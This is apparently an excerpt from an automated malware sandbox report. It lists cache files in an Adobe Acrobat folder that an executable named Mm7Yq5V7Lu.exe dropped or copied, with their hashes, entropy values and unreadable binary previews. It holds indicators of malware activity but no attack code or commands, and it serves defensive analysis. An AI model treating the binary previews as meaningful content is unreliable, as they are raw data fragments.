                                                                                                                                                      Preview: }q,..X...5.....q..>,'..64......;..8}...:Z.,|....3.;........L.S..6D...(6...#..v..#..i.K...`d.9.......~....2.%..5..$..zb.u..W.(..G3I...X.Y....S-....3..<..w,..L...{.i(.Cf.........40.I.)k...E...6+@D_P.V..5.{.3'8...7..B. f%N.p..[........m.....J....Y.b.IJ......51y[O...x[.x.t.^.C.V.<.Eh.g}..y.n...M(.............67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.7910280989932845
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4mvZe0ht3a+Ii5vjduvodYzK8sevWAVgKTaCB7RZ0cHYIgtyUzMpR:D8+IiruGYzCwgck385/
                                                                                                                                                      MD5:B38EDDC6FD72258AA74BC8FC1BD54685
                                                                                                                                                      SHA1:07719174F294F316A8138BC789BCFA7D9C9BF0E7
                                                                                                                                                      SHA-256:66AE4579F61BA0EDEA0A22CC7B0A1A1B52E906E87C9918B6605830228C0B3312
                                                                                                                                                      SHA-512:5E1FFBF4DB7027A7DA15F1D5AF6CC65747239F0350DB40C4CBD39D347B2E4942CD47D46319624EBB00334A3755C28E2A36432F4D10025C29A74152F97D5BC4F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: u......V)or........#n.0........nb.g..y....=_.i....i.Q........%.......!%.<...(.-....|YGR'. }...bC...c..i...$.=L..N...R~...7...8.c.:......0..7.X..n..-r@..`7.RR..M.._..F..j.~....R...j.T.m...Y.J^.i.4....r.%..Z.U...4.g.....'J)..Ez;{U.gu.dc2L........,0-:._.,."B>l).~.L..i[X.J..Kx?J..\3.....a(.H1.G..(:.....3..b......&.\e.._9.c....]... ...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.7910280989932845
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4mvZe0ht3a+Ii5vjduvodYzK8sevWAVgKTaCB7RZ0cHYIgtyUzMpR:D8+IiruGYzCwgck385/
                                                                                                                                                      MD5:B38EDDC6FD72258AA74BC8FC1BD54685
                                                                                                                                                      SHA1:07719174F294F316A8138BC789BCFA7D9C9BF0E7
                                                                                                                                                      SHA-256:66AE4579F61BA0EDEA0A22CC7B0A1A1B52E906E87C9918B6605830228C0B3312
                                                                                                                                                      SHA-512:5E1FFBF4DB7027A7DA15F1D5AF6CC65747239F0350DB40C4CBD39D347B2E4942CD47D46319624EBB00334A3755C28E2A36432F4D10025C29A74152F97D5BC4F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: u......V)or........#n.0........nb.g..y....=_.i....i.Q........%.......!%.<...(.-....|YGR'. }...bC...c..i...$.=L..N...R~...7...8.c.:......0..7.X..n..-r@..`7.RR..M.._..F..j.~....R...j.T.m...Y.J^.i.4....r.%..Z.U...4.g.....'J)..Ez;{U.gu.dc2L........,0-:._.,."B>l).~.L..i[X.J..Kx?J..\3.....a(.H1.G..(:.....3..b......&.\e.._9.c....]... ...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.697132515411871
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Eko+Wk+oCW1NxzK8sevWAVgKTaCB7RZ0cHYIgtyUzu:EUUW7xzCwgck38/
                                                                                                                                                      MD5:2305581CE7027996FFE774FBE175915E
                                                                                                                                                      SHA1:1D1C8DBA4F3E3682A9D225E2869B8B889AACCA49
                                                                                                                                                      SHA-256:912318D0128FC9D79A9C67A8B6684D8A0B6EFB03C09C77D15FBF4AFE1B997C74
                                                                                                                                                      SHA-512:976F52B2F6689ED4220F55D123AF4847EB9BD79D55C81C4E10F51FDE3427097E3F08F2BBF3D24B8A423B5B207E79F870A21EA01001B504E74E7EED1152C566FF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...C.7....~....Y..@.....&.\).7XG.8k..e.p............kb..#.V#g<...i.*C..%.[.VMN.9.....?a%.........-Jj.Y9.......?.,x.::9...T..c..q...'.L..)3...s.df*...+Up...8...}..7...f/.e..O.S../&..k!)....O..(...k.q.U.#^{.$.-..7..<...]a.o..@../.._..B......$.V.wY.."BU.lN.........9...f..Y.G...%..(y...e.7...>..,...A.88.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.697132515411871
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Eko+Wk+oCW1NxzK8sevWAVgKTaCB7RZ0cHYIgtyUzu:EUUW7xzCwgck38/
                                                                                                                                                      MD5:2305581CE7027996FFE774FBE175915E
                                                                                                                                                      SHA1:1D1C8DBA4F3E3682A9D225E2869B8B889AACCA49
                                                                                                                                                      SHA-256:912318D0128FC9D79A9C67A8B6684D8A0B6EFB03C09C77D15FBF4AFE1B997C74
                                                                                                                                                      SHA-512:976F52B2F6689ED4220F55D123AF4847EB9BD79D55C81C4E10F51FDE3427097E3F08F2BBF3D24B8A423B5B207E79F870A21EA01001B504E74E7EED1152C566FF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...C.7....~....Y..@.....&.\).7XG.8k..e.p............kb..#.V#g<...i.*C..%.[.VMN.9.....?a%.........-Jj.Y9.......?.,x.::9...T..c..q...'.L..)3...s.df*...+Up...8...}..7...f/.e..O.S../&..k!)....O..(...k.q.U.#^{.$.-..7..<...]a.o..@../.._..B......$.V.wY.."BU.lN.........9...f..Y.G...%..(y...e.7...>..,...A.88.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.689358834988601
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:xhtFGn2uWyBz0iEzK8sevWAVgKTaCB7RZ0cHYIgtyUzgY+s:xhtF0ZREzCwgck386
                                                                                                                                                      MD5:95D652AE150AD732181F9C27786E5E05
                                                                                                                                                      SHA1:65A92D3159BE34CE6685193DB1C9ECB76B61CE7A
                                                                                                                                                      SHA-256:B78C9118C8AA1C94168B0D52A4B6A829C606ABDF5029F43F966E568E4216F19A
                                                                                                                                                      SHA-512:C277AB3145F2D42109B10EF8221C9A2674E91C8995EDBC72AA0E09BB40F96915A90AD36022FED3D108C2C4B8BE0FDD8F3F611795C8980EBFEA300BA71868C7A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: h.7d.3......m..$.........e..rkW@..|.4Q..)=1t....9...$...NE..t.....z:........#:..u..;..U.t.T<e.eac.x".Fi{.+. .6..ZW~2.z/.V....U..b..b..n.VU........g..!x...ujQ..\..}.TT.)i...........3#......<.......$&J..p->SP.>....u..p>..dg^@.....l......G.e^...01.E....]...%..7P..\.eV<&....C..l.....2.j.....i.De....m.`67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.689358834988601
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:xhtFGn2uWyBz0iEzK8sevWAVgKTaCB7RZ0cHYIgtyUzgY+s:xhtF0ZREzCwgck386
                                                                                                                                                      MD5:95D652AE150AD732181F9C27786E5E05
                                                                                                                                                      SHA1:65A92D3159BE34CE6685193DB1C9ECB76B61CE7A
                                                                                                                                                      SHA-256:B78C9118C8AA1C94168B0D52A4B6A829C606ABDF5029F43F966E568E4216F19A
                                                                                                                                                      SHA-512:C277AB3145F2D42109B10EF8221C9A2674E91C8995EDBC72AA0E09BB40F96915A90AD36022FED3D108C2C4B8BE0FDD8F3F611795C8980EBFEA300BA71868C7A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: h.7d.3......m..$.........e..rkW@..|.4Q..)=1t....9...$...NE..t.....z:........#:..u..;..U.t.T<e.eac.x".Fi{.+. .6..ZW~2.z/.V....U..b..b..n.VU........g..!x...ujQ..\..}.TT.)i...........3#......<.......$&J..p->SP.>....u..p>..dg^@.....l......G.e^...01.E....]...%..7P..\.eV<&....C..l.....2.j.....i.De....m.`67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.871838341990667
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:7OVUGcEpK2Zaf1U/zK8sevWAVgKTaCB7RZ0cHYIgtyUzr0T:7mcEpKCIQzCwgck38K0T
                                                                                                                                                      MD5:7F16F03C5C9CFCAF238BF7C15B1ABF2D
                                                                                                                                                      SHA1:312CFC5817B3B059D90A34EDD98861C0F0EF632D
                                                                                                                                                      SHA-256:2939732B8661C26DF465C8E877A1633BED8766634F9C2BE743B06E773DFBEA2F
                                                                                                                                                      SHA-512:DCC4DF5E513F4C5D024F6F653CC3FCAD94CC03D5C4D4BEC3930B4493DC333D988BDD0DFC2125C5B2E27D79152C809D259A1C05EC4395A49FC00936D89DE974A6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......._.F6.......d."....x...F.......;p?2..}..=...~..`...~}P..:7.....&?.......!^..pH...P.Zz..O..5.J..V.....qu..)..@mS....Tm;lN..3.S-..4...T..=+5...R$g...%..&.......`.[.S.uI...x|.z..@0.....b?.9[.M.Ml....U0jR..Q....oom.ap....]<G..a.`./<@r/C/h..6.....p.....o..:.D.I..%..ge7r...JqY.o.u..aO5..,6....B.9......=.P..h._t..L....z..<.dFA...4.6.........[..`q...p..j.......[...l67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.871838341990667
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:7OVUGcEpK2Zaf1U/zK8sevWAVgKTaCB7RZ0cHYIgtyUzr0T:7mcEpKCIQzCwgck38K0T
                                                                                                                                                      MD5:7F16F03C5C9CFCAF238BF7C15B1ABF2D
                                                                                                                                                      SHA1:312CFC5817B3B059D90A34EDD98861C0F0EF632D
                                                                                                                                                      SHA-256:2939732B8661C26DF465C8E877A1633BED8766634F9C2BE743B06E773DFBEA2F
                                                                                                                                                      SHA-512:DCC4DF5E513F4C5D024F6F653CC3FCAD94CC03D5C4D4BEC3930B4493DC333D988BDD0DFC2125C5B2E27D79152C809D259A1C05EC4395A49FC00936D89DE974A6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......._.F6.......d."....x...F.......;p?2..}..=...~..`...~}P..:7.....&?.......!^..pH...P.Zz..O..5.J..V.....qu..)..@mS....Tm;lN..3.S-..4...T..=+5...R$g...%..&.......`.[.S.uI...x|.z..@0.....b?.9[.M.Ml....U0jR..Q....oom.ap....]<G..a.`./<@r/C/h..6.....p.....o..:.D.I..%..ge7r...JqY.o.u..aO5..,6....B.9......=.P..h._t..L....z..<.dFA...4.6.........[..`q...p..j.......[...l67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.790845620419117
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GvZPVwgNn4r1zK8sevWAVgKTaCB7RZ0cHYIgtyUzAwXHRy33:41pO1zCwgck3838g33
                                                                                                                                                      MD5:9254596442B105C37B198C216935C379
                                                                                                                                                      SHA1:CA4F5A2AA9451B2816463FCA7789F0D1017A6362
                                                                                                                                                      SHA-256:B7949B19AD8966B77EAEF678DC73558125E06F4750CCC7504CD55E1DE91801A3
                                                                                                                                                      SHA-512:AFFE3E6090097494D12A20D12E4F3FBB20CDE035A53C2254714A349F9CC2E8A598D9AFB69B26D4322520B1076EF90FB813C527FF01FABD7BF718DA43A72FAED3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: s.....#G.........t.......P.>....{.|....`.0..O..........KEx9..*..f-&U..w.>......*?C....s...Py..\..WnB.:U.....N...&.....fS.5...ay..?./(..hj6..L.....i......zf.d.....cz.8.......(.a.%\..f..OY.Iw.b>3V..+.c.?n.i3?.19n......Vn-p....Bc.A.-.D..F{....a.B.L.wf.zXv...&4t...,8.|.u.`C.3..LS.s.X...l =./.}.s..R.M.".eS..H..............{.=.d.t........67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.790845620419117
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GvZPVwgNn4r1zK8sevWAVgKTaCB7RZ0cHYIgtyUzAwXHRy33:41pO1zCwgck3838g33
                                                                                                                                                      MD5:9254596442B105C37B198C216935C379
                                                                                                                                                      SHA1:CA4F5A2AA9451B2816463FCA7789F0D1017A6362
                                                                                                                                                      SHA-256:B7949B19AD8966B77EAEF678DC73558125E06F4750CCC7504CD55E1DE91801A3
                                                                                                                                                      SHA-512:AFFE3E6090097494D12A20D12E4F3FBB20CDE035A53C2254714A349F9CC2E8A598D9AFB69B26D4322520B1076EF90FB813C527FF01FABD7BF718DA43A72FAED3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: s.....#G.........t.......P.>....{.|....`.0..O..........KEx9..*..f-&U..w.>......*?C....s...Py..\..WnB.:U.....N...&.....fS.5...ay..?./(..hj6..L.....i......zf.d.....cz.8.......(.a.%\..f..OY.Iw.b>3V..+.c.?n.i3?.19n......Vn-p....Bc.A.-.D..F{....a.B.L.wf.zXv...&4t...,8.|.u.`C.3..LS.s.X...l =./.}.s..R.M.".eS..H..............{.=.d.t........67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.6615073076054765
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ock90jSOwIXwdKcfmzK8sevWAVgKTaCB7RZ0cHYIgtyUzyZ:nDj6BbmzCwgck38nZ
                                                                                                                                                      MD5:C00D23D1DA180A869F8DBB7A737E780F
                                                                                                                                                      SHA1:E8441575CD8B10C6609AB9E57F1544D9B066EE6B
                                                                                                                                                      SHA-256:3C8714AF26DBA9E58988EADA7AF53020C88C003C08E6E1BA809BD95A9F9A09CB
                                                                                                                                                      SHA-512:18A65828DB023F0E639CC97D05393E12A18CCB8F8467044BEA98C1717E07D234125EA56CB5EA1DDDF6DFEC1E6D797F90B4E9A469C5A0D4204439CB47B5A19A42
                                                                                                                                                      Malicious:false
